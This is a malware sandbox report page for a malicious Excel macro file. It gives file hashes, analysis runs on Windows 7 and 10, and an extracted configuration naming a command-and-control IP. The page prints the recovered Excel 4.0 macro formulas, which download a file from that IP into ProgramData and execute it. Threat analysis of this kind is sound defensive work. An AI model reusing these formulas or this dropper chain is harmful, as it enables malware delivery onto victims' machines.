7ae83e314e7c4c27dc93b64397678ce0 | Triage

Submit
Reports

Overview

overview

Static

static

7ae83e314e...0.xlsm

windows7-x64

7ae83e314e...0.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

7ae83e314e7c4c27dc93b64397678ce0.xlsm

Resource

win7-20231215-en

windows7-x64

8 signatures

150 seconds

Behavioral task

behavioral2

Sample

7ae83e314e7c4c27dc93b64397678ce0.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

8 signatures

150 seconds

General

Target

7ae83e314e7c4c27dc93b64397678ce0
Size

6KB
MD5

7ae83e314e7c4c27dc93b64397678ce0
SHA1

3283589cbe6dada8880a1a473f96721f62e684e2
SHA256

0fb8c1b56595645ef546ff1e255fb2ff1ce7feb2a001a58c9321b2014b536bbd
SHA512

758cfa7524915abae732d8ff853c9d05a5fd4c18aa174e1269aca38b468fddc71ee71e62dc2c0c9d3778869396acf9fc8791dbaf7559b6f12a4d1bd7c1daff86
SSDEEP

192:NDSiuSO1aEOmmfRX8UhHFBFYuJb98ynLldTQ:NluvwR1FYUb98yL7Q

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187

Attributes

formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Signatures

Files

7ae83e314e7c4c27dc93b64397678ce0
.xlsm office2007

© 2018-2025

Terms | Privacy